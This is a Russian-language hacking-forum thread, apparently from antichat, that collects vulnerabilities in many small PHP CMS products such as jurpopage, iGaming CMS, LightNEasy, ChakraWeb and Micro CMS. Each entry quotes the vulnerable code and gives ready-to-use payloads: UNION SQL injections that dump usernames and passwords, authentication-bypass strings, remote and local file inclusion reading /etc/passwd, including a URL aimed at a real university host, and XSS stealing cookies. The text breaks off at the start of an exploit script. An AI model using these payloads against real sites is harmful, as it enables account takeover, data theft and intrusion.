faNAME product : en.faname SQL injection 1. mq = off page.php - уязвимость в коде файла /class/page.php к которому обращается файл Code : PHP: $id = $_GET['id']; $kind = "id"; $result = mysql_query("SELECT * FROM blog WHERE $kind LIKE '$id' order by id DESC LIMIT 1"); while($r=mysql_fetch_array($result)) result : Code: http://localhost/en.faname/page.php?id=2'+and+0+union+all+select+1,version(),3,4--+ Blind sql 2. admin panel /admin/del.page.php PHP: if($_GET["cmd"]=="delete") { $id = $_GET['id']; $sql = "DELETE FROM blog WHERE id=$id"; $result = mysql_query($sql); result : Code: http://localhost/en.faname/admin/del.page.php?cmd=delete&id={blind sql} Passive XSS mq = off Code: http://localhost/en.faname/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
Драконий Движок product : Драконий Движок 0.1 RFI - LFI mq=off (Доступ в админ панель не нужна) admin/system/include.php - Code : PHP: include("$skindir/header.php"); .... include("$skindir/footer.php"); result : Code: http://localhost/admin/system/include.php?skindir=../../[FILE]%00 Code: http://localhost/admin/system/include.php?skindir=http://localhost/1.txt? SQL Injection standart prefix : dre_ mq = off index.php - обращение к файлу admin/system/engine.php : CODE PHP: if ($p != "") $build .= " AND aid = '$p'"; if ($cat || $user) { if (!$p) { if ($cat) {$build .= " AND category = '$cat'";} if ($user) {$build .= " AND username = '$user'";} result : Code: http://localhost/index.php?cat=1'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+ Code: http://localhost/index.php?user=1'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+ Code: http://localhost/index.php?p=2'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+ Admin panel mq=off admin/profile.php : Code PHP: $result = mysql_query("SELECT * FROM ".$prefix."profile WHERE username = '$username'"); result : Code: http://localhost/admin/profile.php?action=view&username=admin'+and+0+union+all+select+concat_ws(0x3a,uid,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+dre_users--+ admin/categories.php - Code : PHP: $result = mysql_query("SELECT * FROM ".$prefix."categories WHERE cid='$cid'"); result : Code: http://localhost/admin/categories.php?action=edit&cid=1'+and+0+union+all+select+1,concat_ws(0x3a,uid,username,password)+from+dre_users--+ Ну и в конце комментирование - в текст комментария добавляем (для MySQL 5.0. ...) Code: '/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1 Passive XSS Code: http://localhost/index.php/%22%3E%3Cscript%3Ealert();%3C/script%3E
jurpopage product : jurpopage-0.0.6 admin panel : /jurpopageadmin SQL injection mq=off index.php PHP: $query = "SELECT category_id AS category FROM category WHERE page_id='$page_id' ORDER BY category_id ASC LIMIT 0,1"; $result = fn_query($conn_id,$query); while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE); } $active_category_id = $category; $query = "SELECT category_title AS active_category_title FROM category WHERE page_id='$page_id' AND category_id = '$active_category_id'"; $result = fn_query($conn_id,$query); while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE); if(isset($HTTP_GET_VARS["id"])) $q_note_detail ="page_id = '$page_id' AND note_id = '$id'"; else $q_note_detail ="page_id = '$page_id' AND category_id = '$active_category_id' ORDER BY note_id DESC LIMIT 0,1"; ... $q_page ="WHERE page_id = '$page_id' AND category_id = '$active_category_id' "; result : Code: http://localhost/index.php?page_id=[sql] Code: http://localhost/index.php?page_id=1&category=[sql] Code: http://localhost/index.php?page_id=1&category=100&id=49'+union+all+select+1,2,concat_ws(0x3a,user_name,user_password),4+from+master_user+limit+1,1--+ jurpopageadmin/note.php mq=off доступ в админ панель PHP: $query = "SELECT category_title FROM category WHERE page_id = '".$page_id."' AND category_id = '$category_id'"; Code: http://localhost/jurpopageadmin/note.php?page_id=[sql]&category=[sql] Passive XSS mq=off Code: http://localhost/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
PHPShop CMS Free v.3.1 http://www.phpshopcms.ru/ Active XSS PHP: // Запись отзыва в базу function WriteGbook() { global $LoadItems,$SysValue,$REMOTE_ADDR,$SERVER_NAME; // Подключаем библиотеку отправки почты PHPShopObj::loadClass("mail"); if(isset($_POST['send_gb'])) { if(!preg_match("/@/",$_POST['mail_new']))//проверка почты { $_POST['mail_new']=""; } if(@$_POST['name_new']!="" and @$_POST['otsiv_new']!="" and @$_POST['tema_new']!="") { $name_new=PHPShopSecurity::TotalClean($_POST['name_new'],2); $otsiv_new=PHPShopSecurity::TotalClean($_POST['otsiv_new'],2); $tema_new=PHPShopSecurity::TotalClean($_POST['tema_new'],2); $mail_new=addslashes($_POST['mail_new']); $date = date("d.m.y"); $ip=$REMOTE_ADDR; $sql="INSERT INTO ".$SysValue['base']['table_name7']." VALUES ('','$date','$name_new','$mail_new','$tema_new','$otsiv_new','','0')"; mysql_query($sql)or @die($sql."Невозможно добавить к базе"); $zag=$LoadItems['System']['name']." - Уведомление о добалении отзыва / ".date("d-m-y"); $message=" Доброго времени! --------------- С сайта ".$LoadItems['System']['name']." пришло уведомление о добалении отзыва в гостевую книгу. Данные о пользователе: ---------------------- Имя: ".@$name_new." E-mail: ".@$mail_new." Тема сообщения: ".@$tema_new." Сообщение: ".@$otsiv_new." Дата: ".date("d-m-y H:s a")." IP: ".$REMOTE_ADDR." --------------- С уважением, Компания ".$LoadItems['System']['company']." http://".$SERVER_NAME; $PHPShopMail = new PHPShopMail($LoadItems['System']['adminmail2'],$mail_new,$zag,$message); } } } Code: Проверка email только на @ if(!preg_match("/@/",$_POST['mail_new'])){ } http://localhost/phpshop/gbook_forma/ POST: mail_new mail_new = "><script>alert(1)</script>@<" Расшифровал index.php если кому интересно PHP: <? session_start(); error_reporting(0); if (file_exists("./cnstats/index.php")) include ("./cnstats/cnt.php"); function ParseTemplate($TemplateName) { global $SysValue, $_SESSION, $PHP_SELF, $_ENV; $file = newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . chr(47) . $TemplateName); $string = newParser($file); $path_parts = pathinfo($PHP_SELF); if (getenv("COMSPEC")) $dirSlesh = "\\"; else $dirSlesh = "/"; $root = $path_parts['dirname'] . "/"; if ($path_parts['dirname'] != $dirSlesh) { $replaces = array("/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . "/images/", "/\/favicon.ico/i" => $root . "favicon.ico", "/java\//i" => $root . "java/", "/css\//i" => $root . "css/", "/phpshop\//i" => $root . "phpshop/", "/\/links\//i" => $root . "links/", "/\/files\//i" => $root . "files/", "/\/opros\//i" => $root . "opros/", "/\/page\//i" => $root . "page/", "/\/news\//i" => $root . "news/", "/\/gbook\//i" => $root . "gbook/", "/\/search\//i" => $root . "search/", "/\"\/\"/i" => $root, "/\/map\//i" => $root . "map/", "/\/rss\//i" => $root . "rss/", ); } else { $replaces = array("/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . "/images/", "/java\//i" => "/java/", "/css\//i" => "/css/", "/phpshop\//i" => "/phpshop/", ); } $string = preg_replace(array_keys($replaces), array_values($replaces), $string); echo $string; } function ParseTemplateReturn($TemplateName) { global $SysValue, $LoadItems, $_SESSION; $SysValue = $GLOBALS['SysValue']; $file = newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . chr(47) . $TemplateName); $dis = newParser($file); return @$dis; } function ConstantS($string) { return @preg_replace_callback("/@([[:alnum:]]+)@/", "ConstantR", $string); } function allowedFunctions($str) { $allowFunctions = array('if', 'else', 'swicth', 'for', 'foreach', 'phpinfo', 'echo', 'print', 'print_r'); $allowFunctions = array_merge($allowFunctions, explode(',', $GLOBALS['SysValue']['function']['allowed'])); preg_match_all('/\s*([A-Za-z0-9_]+)\s*\(/isU', $str, $findedFunctions); $remElements = array_diff($findedFunctions[1], $allowFunctions); if (count($remElements) > 0) { echo ('<br><br><b>В шаблоне обнаружена запрещенная функция</b><br>'); echo ('Список найденных запрещенных функций:'); echo ('<pre>'); foreach ($remElements as $remElement) { echo ($remElement . '()<br>'); } echo ('</pre><br>'); echo ('Список разрешенных функций (добавить свою функцию можно в config.ini):'); echo ('<pre>'); foreach ($allowFunctions as $allowFunction) { echo ($allowFunction . '()<br>'); } echo ('<br>'); echo ('</pre><br>'); return false; } else { return true; } } function evalstr($str) { ob_start(); if (eval(stripslashes($str[2])) !== null) { echo ('<center style="color:red"><br><br><b>PHPShop Template Code: В шаблоне обнаружена ошибка выполнения php</b><br>'); echo ('Код содержащий ошибки:'); echo ('<pre>'); echo ($str[2]); echo ('</pre></center>'); return ob_get_clean(); } return ob_get_clean(); } function newParser($string) { global $SysValue; $newstring = @preg_replace_callback("/(@php)(.*)(php@)/sU", "evalstr", $string); $newstring = @preg_replace("/@([[:alnum:]]+)@/e", '$SysValue["other"]["\1"]', $newstring); return $newstring; } function ConstantR($array) { global $SysValue; if (!empty($SysValue['other'][$array[1]])) $string = $SysValue['other'][$array[1]]; else $string = null; return $string; } function newGetFile($path) { $file = @file_get_contents($path); if (!$file) return false; return $file; } $time = explode(' ', microtime()); $start_time = $time[1] + $time[0]; include ("./phpshop/class/base.class.php"); $PHPShopBase = new PHPShopBase("./phpshop/inc/config.ini"); $RegTo['RegisteredTo'] = "PHPShop CMS Free"; $RegTo['CopyrightEnabled'] = "Yes"; $RegTo['DomenLocked'] = "No"; $RegTo['CopyrightColor'] = "6A7EA1"; $RegTo['SupportExpires'] = "0"; include ($SysValue['file']['error']); if (empty($GLOBALS['p'])) $GLOBALS['p'] = 1; if ($SysValue['my']['gzip'] == "true") include ($SysValue['file']['gzip']); include ($SysValue['class']['obj']); include ($SysValue['class']['array']); include ($SysValue['class']['category']); include ($SysValue['class']['system']); include ($SysValue['class']['page']); include ($SysValue['class']['photo']); include ($SysValue['class']['nav']); include ($SysValue['class']['security']); $PHPShopSystem = new PHPShopSystem(); $LoadItems['System'] = $PHPShopSystem->getArray(); $PHPShopNav = new PHPShopNav(); include ($SysValue['file']['engine']); include ($SysValue['file']['catalog']); include ($SysValue['file']['news']); include ($SysValue['file']['subnews']); include ($SysValue['file']['baner']); include ($SysValue['file']['cache']); include ($SysValue['file']['opros']); if ($LoadItems['System']['spec_num'] == 1) { if (isset($_REQUEST['skin'])) { if (file_exists("phpshop/templates/" . $_REQUEST['skin'] . "/index.html")) { $skin = $_REQUEST['skin']; session_register('skin'); } } elseif (empty($_SESSION['skin'])) { $skin = $LoadItems['System']['skin']; session_register('skin'); } $SysValue['other']['skinSelect'] = Skin_select($_SESSION['skin']); } else { $skin = $LoadItems['System']['skin']; session_register('skin'); } $LoadItems = CacheReturn(); foreach (@$SysValue['autoload'] as $val) if (file_exists($val)) include_once ($val); function GetFileInstall() { global $SysValue; $filename = "./install/"; if (is_dir($filename)) exit(PHPSHOP_error(105, $SysValue['my']['error_tracer'])); } if (!getenv("COMSPEC")) $GetFileInstall = GetFileInstall(); if ((isset($_GET['nav'])) && ($_GET['nav'] == "page")) { $Check_page_skin = Check_page_skin($_GET['name']); if ($Check_page_skin != "") { $skin = $Check_page_skin; session_register('skin'); } elseif ($LoadItems['System']['spec_num'] != 1) { $skin = $LoadItems['System']['skin']; session_register('skin'); } } if (isset($_POST['skin'])) header("Location: " . htmlspecialchars($REQUEST_URI)); include ($SysValue['file']['meta']); $SysValue['other']['ProductName'] = $SysValue['license']['product_name']; include ($SysValue['file']['autoload']); $time = explode(' ', microtime()); $seconds = ($time[1] + $time[0] - $start_time); $seconds = substr($seconds, 0, 6); echo "<!-- StNF " . $SysValue['sql']['num'] . " ~ $seconds -->"; if ($SysValue['my']['gzip'] == "true") GzDocOut($SysValue['my']['gzip_level'], $SysValue['my']['gzip_debug']); ?>
product : jurpopage-0.0.6 Дополнение постов [x60]unu... SQL inj html.php mg=off PHP: ... if(empty($id)) $id=1; $web = new speed_template($template_path); $web->register($template_name); $query = " SELECT * FROM webpg WHERE webpg_id='$id' "; ... Result: http://localhost/jurp/html.php?id=[sql] http://localhost/jurp/html.php?id=3'+union+select+1,2,3--+ SQL inj Файл login.php POST + капча mg=off В скрипте 2 запроса. Многострочный коментарий надо во второй запрос втулить чтоб обойти авторизацию, но так как там upper(), то не получаеться, вот. Но самое интересное что -- принимает. В поле с USER ID такую строку и имеею иньекцию в первом запросе. Обязательны все 3 поля. PHP: ...$conn_id = connect(); //--- check apakah ada nama user tersebut //master user $query = " SELECT count(*) as user_exist FROM master_user WHERE upper(user_id) = upper('$send_user') "; $result = fn_query($conn_id,$query); $mRet =fn_fetch_row($result); if ($mRet[0]>0) { //proses while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE); $password = md5($password); $query = " SELECT #user_id as temp_value, user_level as temp_level user_id as temp_value, user_level as temp_level, master_user_id as temp_rowid FROM master_user WHERE upper(user_id) = upper('$send_user') and user_password = '$password' ";... вывод ошибок от СУБД есть, файл fungsi.php PHP: ...function fn_query($conn, $input) { //$result =pg_query($input,$conn); $result =@mysql_query($input,$conn); if (!$result) { die ("Error eksekusi:<br>".mysql_error()); return false; } return $result;...
Дополнение постов [x60]unu... iGaming CMS Product : iGaming CMS version : 1.5 site : forums.igamingcms.com SQL inj Файл screenshots.php mg=off PHP: ...if (isset($_REQUEST[id])) { $result = $db->Execute("SELECT * FROM `sp_screenshots` WHERE `id` = '$_REQUEST[id]' LIMIT 1"); echo $start_table . '<b>',stripslashes($result->fields['title']),'</b>' . $end_table . '<br />'; echo '<center><img src="',$result->fields['screen'],'" border="0" alt="',stripslashes($result->fields['title']),'"></center>'; }... Result: http://localhost/gami/screenshots.php?id=1[sql] http://localhost/gami/screenshots.php?id=-1'+union+select+1,version(),3,4,5--+ SQL inj reviews.php mg=off PHP: ... if (isset($_REQUEST['browse'])) { $sql = $db->Execute("SELECT id,title,section FROM `sp_reviews` WHERE `title` LIKE '".$_REQUEST['browse']."%' ORDER BY `title`");... Result: http://localhost/gami/reviews.php?browse=Z[sql] http://localhost/gami/reviews.php?browse=Z'+union+select+1,2,3/* SQL ing search.php mg=off PHP: ... if ($_REQUEST['platform'] != 'all') { $platform = "`section` = '" . $_REQUEST['platform'] . "' "; } else { $platform = "`section` LIKE '%' "; } if ($_REQUEST['exact'] == '1') { $title = "`title` = '".$_REQUEST['keywords']."' "; } else { $title = "`title` LIKE '%".$_REQUEST['keywords']."%' "; } $result = $db->Execute("SELECT id,title,section,publisher,developer FROM `sp_games` WHERE $title AND $platform AND `published` = '1' ORDER BY `title`"); while ($row = $result->FetchNextObject()) {... Result: Посылаем пост или гет запрос. $_REQUEST['keywords'][sql] или на другую переменную... поле Keywords пишем - %' union select 1,version(),3,4,5/* Blind sql poll_vote.php PHP: $result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'"); $ip = $db->Execute("SELECT * FROM sp_polls_iplog WHERE pollid = '" . $result->fields['poll_id'] . "' AND ip = '" . $_SERVER['REMOTE_ADDR'] . "';") or die($db->ErrorMsg()); if ($ip->RecordCount() < 1) { $count2 = $result->fields['count'] + 1; $db->Execute("UPDATE `sp_polls_options` SET `count` = $count2 WHERE `id` = '$_REQUEST[id]'"); $db->Execute("INSERT INTO sp_polls_iplog (pollid,ip) VALUES ('" . $result->fields['poll_id'] . "','" . $_SERVER['REMOTE_ADDR'] . "');"); } если чесно даже ковырять впадляк !!! много дыр...
Jupiter 1.1.5 http://www.jupiterportal.org passive xss было скачано с http://www.cmsdownload.com/index.php?name=Downloads&get=99&mirror=132 PHP: ...error_reporting (E_ALL); $PHP_SELF = $_SERVER['PHP_SELF'];... PHP: ...<tr><td class="con1" valign="top"><a href="<?= $PHP_SELF ?>?a=logout"> » <?= $language['Bans desc4'] ?></a></td></tr>... PHP: ...if(!isset($is_loged_in)) { ?> <tr class='bottom' height='1%'><td valign='top'><?= $language['Maintance title2'] ?></td></tr><tr><td class='con2'><?= messagedef($language['Header message']) ?></td></tr> <tr><td class='con1' height='96%' valign='top'> <form method='post' action='<?= $PHP_SELF ?>?n=modules/login'>... PHP: ...<table width='100%' cellspacing='1' border='0' cellpadding='2'> <tr><td class='empty' width='35%' valign='top'><a href='<?= $PHP_SELF ?>?n=modules/login&a=1'> » <?= $language['Maintance desc6'] ?></a></td> <td class='con1' width='5%'> </td>... PHP: ...if(file_exists("$n.php")) { if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error"); else include("$n.php"); } elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");... Result: http://localhost/jupiter/index.php[XSS] passive xss modules/block.php PHP: ...if(!isset($is_webmaster)) { header("location: $PHP_SELF?i=2"); exit; }... Result:http://localhost/jupiter/modules/blocks.php[XSS] http://localhost/jupiter/modules/blocks.php%3Cscript%3Ealert(123)%3C/script%3E В скриптах есть еще много XSS=/
LightNEasy site:http://www.lightneasy.org/index.php magic_quotes_gps = off Вход с полномочиями admin Единственное, что я придумал: login: "+union+select+1,2,'40bd001563085fc35165329ea1ff5c5ecbdbbeef',5,5,6,7,8,9,10,11+--+ pass: 123 40bd001563085fc35165329ea1ff5c5ecbdbbeef - sha-1("123") Уязвимый код(common.php): PHP: $result=dbquery('SELECT * FROM '.$prefix.'users WHERE handle="'.$_POST['handle'].'"'); if($row = fetch_array($result)) { if($row['password'] == sha1($_POST['password'])) { //inserts password in cookie setcookie('userpass', sha1(trim($_POST['password'])), time() + 60 * 60 * 24 * 30); setcookie('userhandle', $_POST['handle'], time() + 60 * 60 * 24 * 30); $_SESSION[$set['password']]="1"; $_SESSION['user']=$row['handle']; $_SESSION['adminlevel']=$row['adminlevel']; $message=$langmessage[95]; unset($_GET['do']); header("Location: ".$set['homepath']); } else $message=$langmessage[96]; } else $message=$langmessage[96]; Activexss http://localhost/light/LightNEasy.php?page=news Code: commentmessage=<script>alert(document.cookie)</script> Уязвимый код(common.php) PHP: $_POST['commentmessage'] = str_replace($order, "<br />", $_POST['commentmessage']); $query="INSERT INTO ".$prefix."comments (newsid, poster, postermail, time, text) VALUES (".$_POST['newsid'].",\" ".encode($_POST['commentname'])."\", \"".encode($_POST['commentemail'])."\", ".time().", \"".encode(stripslashes($_POST['commentmessage']))."\")"; dbquery($query);
Дополнение к https://forum.antichat.ru/showpost.php?p=1991535&postcount=343 --------------------------------------- SQL injection(требования: mq=off,rq=on) №1 file: modules/users.php PHP: case 1: .... $user = $db->getLine("SELECT * FROM users",$d); if(!$user) header("location: $PHP_SELF?i=error"); .... file: includes/functions_db.php PHP: function getLine($query,$id=FALSE) { if($id===FALSE) $this->query($query); else $this->query($query." WHERE `id`='$id'"); if(is_resource($this->sqlr)) { $line=mysql_fetch_assoc($this->sqlr); $this->freeResult(); return $line; } return FALSE; } result: Code: /index.php?n=modules/users&a=1&d=-1'+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+where+id=1+--+ №2 file: modules/forum.php PHP: case 1: ... $forum_cat = $db->getLine("SELECT id, name FROM forum_cat",$d); if(!$forum_cat) header("location: $PHP_SELF?i=error"); ... file: includes/functions_db.php PHP: function getLine($query,$id=FALSE) { if($id===FALSE) $this->query($query); else $this->query($query." WHERE `id`='$id'"); if(is_resource($this->sqlr)) { $line=mysql_fetch_assoc($this->sqlr); $this->freeResult(); return $line; } return FALSE; } result: Code: /index.php?n=modules/forum&a=1&d=-1'+union+select+1,concat_ws(0x3a,username,password)+from+users+where+id=1+--+ //инъекции с использованием бажной функции getLine №3 /index.php?n=modules/forum&a=3&d=1&o=1&q=-1'+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users+where+id=1+--+ №4 /index.php?n=modules/forum&a=5&d=1&o=1&q=1&p=0&k=-1'+union+select+1,concat_ws(0x3a,username,password)+from+users+where+id=1+--+ №5 /index.php?n=modules/pm&a=3&d=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users+where+id=1+--+&s=r_date&t=DESC&p=1 ...
Product: Acute Control Panel Version: 1.1.1 Author: http://acutecp.rediscussed.com/ Автор выложил на опенсурсецмс.орг, наткнулся, и посмотрел SQL-Inj Need: mq = off File: acute-cp/login.php PHP: $username = strtolower($_POST['username']); $password = strtolower($_POST['password']); if (!empty($username) || !empty($password)){ $query = mysql_query("SELECT id,username,password,email,fullname,permissions FROM `users` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error()); $row = mysql_fetch_array($query); .... if(mysql_numrows($query)== 1){ $_SESSION['username']=$row['username']; $_SESSION['email']=$row['email']; $_SESSION['fullname']=$row['fullname']; $_SESSION['permissions']=$row['permissions']; Target: {POST} ?login=-1'+union+select+1,2,3,4,5,6+--+&password=1[/COLOR or ByPass:{POST} ?login=-22' or 1=1+--+&password=1 После установки сессий, есть возможность проводить инъекции практически во все файлы.Например можно сделать локальный инклуд: File: acute-cp/options.php PHP: $so_theme = $_POST['so_theme']; .... $so_edit_settings = $_POST['Update']; if(isset($so_edit_settings)){ $result = mysql_query("UPDATE `settings` SET `website_option`='$so_theme' WHERE website_setting='theme'")or die(mysql_error()); ... File: web_settings.php PHP: $result = mysql_query("SELECT `website_option` FROM `settings` WHERE website_setting='theme'",$conn) or die(mysql_error()); $theme_name_result = mysql_fetch_row($result); $theme_name = $theme_name_result['0']; //$theme_directory = "themes/".$theme_name; //old code that was exploited If(strpos($_SERVER['SCRIPT_FILENAME'],"acute-cp")){ //is in sub folder, such as admin define("theme_directory","../themes/".$theme_name); }else{ define("theme_directory","themes/".$theme_name); } File: index.php PHP: <?php include_once("web_settings.php"); ?> <?php include_once(theme_directory."/header.php"); ?> Target: {POST} acute-cp/options.php?so_theme=../../../../../../../etc/passwd%00 Enter: http://target/index.php
STACK System for Teaching and Assessment using a Computer algebra Kernel The STACK system is a computer aided assessment package for mathematics. LFI example: Code: http://vesna.fmf.uni-lj.si/stack/documentation.php?action=/../../../../../../../etc/passwd%00&expand=13 HOME PAGE: Code: http://sourceforge.net/projects/stack/ Vulnerable: Stack 1.1
Продукт ChakraWeb! Скачал отсюдо SQL inj mg не имеет значения! /phpmod/news.php Для рядового польз.: PHP: ...case 'detail': NewsShowDetail(); break;... PHP: ...function NewsShowDetail() { $news_id = RequestGetValue('id', 0); $sql = "select news_title, news_desc, news_content from news where news_id=$news_id"; $rs = DbExecute($sql); if ($rs && !$rs->EOF)... /_files/library/fun_utils.php PHP: ... function RequestGetValue($var_name, $default=false, $clean=CLEAN_NO) { global $PhpMagicQuote; if (isset($_REQUEST[$var_name])) { $out = $_REQUEST[$var_name]; if (is_string($out)) { if ($PhpMagicQuote) $out = stripslashes($out); $out = trim($out); } if ($clean == CLEAN_SAVE) $out = HtmlClean($out); else if ($clean == CLEAN_ALL) $out = HtmlCleanAll($out); } else $out = $default; return $out; }... Result: http://chakra/phpmod/news.php?op=detail&id=1[SQL]&cat=3 http://chakra/phpmod/news.php?op=detail&id=-1+union+select+concat_ws%280x3a,m_name,m_password%29,2,3+from+sysmember+limit+1,1--+&cat=3 /files/library/fun_web.php function InitSystemVars() PHP: ... $gFolderId = RequestGetValue('cat', 0); if ($gFolderId == 0)... function NewsShowPage PHP: ... $gPageId = 0; DBGetFolderData($gFolderId); $gWebPage['page_sidebar'] = RenderPageSidebar()... /_files/library/fun_web.php PHP: ...function DBGetFolderData($folder_id) { global $gCurrentUrlPath; global $gFolder; global $db; global $gReadLevel, $gWriteLevel; if ($folder_id >= 0) { $sql = "select folder_lid, folder_id, folder_name, folder_label, folder_title, folder_desc, folder_keywords, folder_robots, folder_sidebar, folder_parent, folder_show, folder_active, folder_order, read_level, write_level, upload_by, upload_on, update_on from web_folder where folder_id=$folder_id and folder_lid=".$db->qstr(UserGetLID()); $rs = DbExecute($sql); if ($rs === false) DbFatalError("DBGetFolderData"); if (!$rs->EOF) {... /_files/library/fun_dbutils.php PHP: ...function DbFatalError($section, $msg='') { global $db; if (!empty($msg)) $msg .= '. '; $msg .= $db->ErrorMsg(); DbLogWrite($section, '.MSG:', $msg); SystemFatalError($section, $msg); }... /_files/library/cls_dbase.php PHP: ... function ErrorMsg() { return 'DBError('.@mysql_errno().'): '.@mysql_error(); }... /_files/library/fun_systems.php PHP: ...function SystemFatalError($section, $msg) { SetDynamicContent(); $out = '<html><head><title>Fatal System Error</title>'; $out .= '</head><body>'; $out .= '<hr noshade size=2>'; $out .= 'Fatal System Error On <b>'.$section.':</b><br> '.$msg; $out .= '<hr noshade size=2>'; $out .= 'Sorry for this unconvenience. Please report to the webmaster of this homepage.'; $out .= '</body></html>'; echo $out; die(); }... Result: http://chakra/phpmod/news.php?op=detail&id=1&cat=3[SQL] http://chakra/phpmod/news.php?op=detail&id=1&cat=3+and+%281,2%29=%28select+*+from%28select+name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29-- XSS /phpmod/search.php PHP: ... $q = RequestGetValue('q', ''); $p = RequestGetValue('p', 1); $title = "<h1>"._HPAGE_SEARCH_TITLE."</h1>\n"; $content = "<p>".sprintf(_HPAGE_SEARCH_MESSAGE, $q)."</p>\n";... Result: http://chakra/phpmod/search.php?q=[XSS] http://chakra/phpmod/search.php?q=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E SQL inj /phpmod/link.php $op приним. (ряд. пользователь) PHP: ...case 'show': LinkInitVars(); LinkFormShow('add', false); break;... Функция RequestGetValue описана выше! PHP: function LinkInitVars() { global $gWebPage; global $gPageId; global $gFolder, $gFolderId; $gWebPage['from'] = ''; $gWebPage['fld_id'] = 0; $gWebPage['fld_url'] = ''; $gWebPage['fld_title'] = ''; $gWebPage['fld_desc'] = ''; $gWebPage['fld_note'] = ''; $gPageId = RequestGetValue('id', 0); } PHP: ...function LinkFormShow($op, $dbinit, $errmsg='') { global $gFolder, $gFolderId; global $gRequestPath, $gCurrentUrlPath, $gRequestFile; global $gWebPage; global $gHomePageHeader, $gHomePageFooter; global $gBaseLocalPath; global $gHomePageUrl, $gPageNavigation; $from = RequestGetValue('from'); if (!empty($from)) { $gCurrentPageNavigation = ''; $gPageNavigation = array(); $gPageNavigation[] = array($gHomePageUrl.$gBaseUrlPath."/index.html", _NAV_FRONTPAGE); $gPageNavigation[] = array($gHomePageUrl."/phpmod/cpanel.php", _NAV_CONTROL_PANEL); $gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php", _NAV_TODO_LIST); $gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php?op=link", _NAV_TODO_LINK); $gWebPage['from'] = $from; } else { DBGetFolderData($gFolderId); $gRequestPath = FindPathFromFolderId($gFolderId); $gCurrentUrlPath = $gBaseUrlPath.$gRequestPath; $gRequestFile = 'index.html'; $gWebPage['from'] = ''; } ... Принтабельное поле, где именно код впадло искать ! Result: http://chakra/phpmod/link.php?op=show&cat=4[SQL] http://chakra/phpmod/link.php?op=show&cat=4+and+0+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29,10,11,12,13,14,15,16,17,18--+
Продукт Micro CMS 3.5 скачать SQL inj /microcms-admin-login.php PHP: ...if ($i == 0) { $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "' . $_POST['administrators_username'] . '" and administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")'; $user_result = mysql_query($sql);... Класика жанра! POST запрос: action - "microcms-admin-login.php" текстовое поле - "administrators_username", поле для ввода пасса - "administrators_pass", скрытое [ name="action" type="hidden" value="admin_login" ] Result: поле administrators_username = admin поле administrators_pass = 123") or 1=1 Или в первое поле - странная ошибка! Мы внутри! ;-) SQL inj /micro_cms_files/cms/revert-content.php - 3 поле принтаб PHP: ...if ($_GET['type'] == 'newer') { $result = mysql_query(' SELECT * FROM microcms_content_blurb_history WHERE content_blurbs_variable = "' . $_GET['id'] . '" and content_blurb_history_version_num = "' . $_GET['version'] . '" ORDER BY content_blurb_history_version_num ASC LIMIT 1'); } elseif ($_GET['type'] == 'older') {... Result: http://microcms/micro_cms_files/cms/revert-content.php?id=test_content[SQL]&type=newest ы_ы, нашы админы! HTML: http://microcms/micro_cms_files/cms/revert-content.php?id=test_content%22+union+select+1,2,group_concat(concat_ws(0x3a,administrators_username,administrators_pass)%20separator%200x40),4,5+from+microcms_administrators--+&type=newest Забыл : условия - mg=off Реальные примеры: admin" or "admin"="admin" /* пасс любой admin" or "admin"="admin" /* пасс любой
Product: ArtiPHP Version: 5.0.0 Neo Author: http://www.artiphp.com/ Blind SQL-Injection. Need: mq=off. File: artpublic/utilisateurs/modif_inscription.php PHP: $prenom = htmlspecialchars($prenom); $nom = htmlspecialchars($nom); $login = htmlspecialchars($login); $login2 = htmlspecialchars($_POST['login2']); $site = htmlspecialchars($site); $url = htmlspecialchars($url); $ville = htmlspecialchars($ville); $metier = htmlspecialchars($metier); $pass = htmlspecialchars($pass); $pass2 = htmlspecialchars($pass2); .... if ($pass && $pass2) { // ***** MODIF jimro ***** Ajout $passMD5 et modif requкte - 28/10/2005 $passMD5 = md5($pass); $requete = "UPDATE " . ARTI_PREFIX_TB . "utilisateurs SET prenomUtilisateur='$prenom', nomUtilisateur='$nom', passUtilisateur=password('$pass'), passUtilisateurMD5='$passMD5', loginUtilisateur='$login2', siteUtilisateur='$site', urlUtilisateur='$url', villeUtilisateur='$ville', metierUtilisateur='$metier' WHERE id_utilisateur='$SESSION_ID'"; ... Target: Expl0it: PHP: <?php /** * @author m0hze * @copyright 2010 * @{http://forum.antichat.net} * @ Yeeeees, baby! */ $host = 